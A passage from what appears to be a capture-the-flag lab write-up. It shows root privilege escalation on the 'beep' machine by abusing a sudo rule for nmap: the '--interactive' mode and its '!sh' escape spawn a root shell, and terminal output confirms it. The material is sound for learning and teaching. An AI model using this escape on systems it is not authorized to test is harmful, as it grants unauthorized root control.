Nmap
While there are so many different ways to escalate privileges to the root user, I will go with one of the simple ways that abuses the current user’s sudo privileges
I found out earlier that the asterisk user is able to execute /usr/bin/nmap as the root user
according to gtfobins, Nmap can be used to elevate privileges if configured to run as superuser
bash-3.2$ sudo -u root /usr/bin/nmap --interactive
starting nmap v. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> Following through
nmap> !sh
sh-3.2# whoami
root
sh-3.2# hostname
beep
sh-3.2# /sbin/ifconfig
eth0 link encap:Ethernet HWaddr 00:50:56:B9:54:75
inet addr:10.10.10.7 Bcast:10.10.10.255 Mask:255.255.255.0
up broadcast running multicast mtu:1500 Metric:1
rx packets:4668 errors:0 dropped:0 overruns:0 frame:0
tx packets:3917 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:1251095 (1.1 MiB) TX bytes:924455 (902.7 KiB)
interrupt:59 Base address:0x2024
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
up loopback running mtu:16436 Metric:1
rx packets:2469 errors:0 dropped:0 overruns:0 frame:0
tx packets:2469 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
rx bytes:331864 (324.0 KiB) TX bytes:331864 (324.0 KiB)System Level Compromise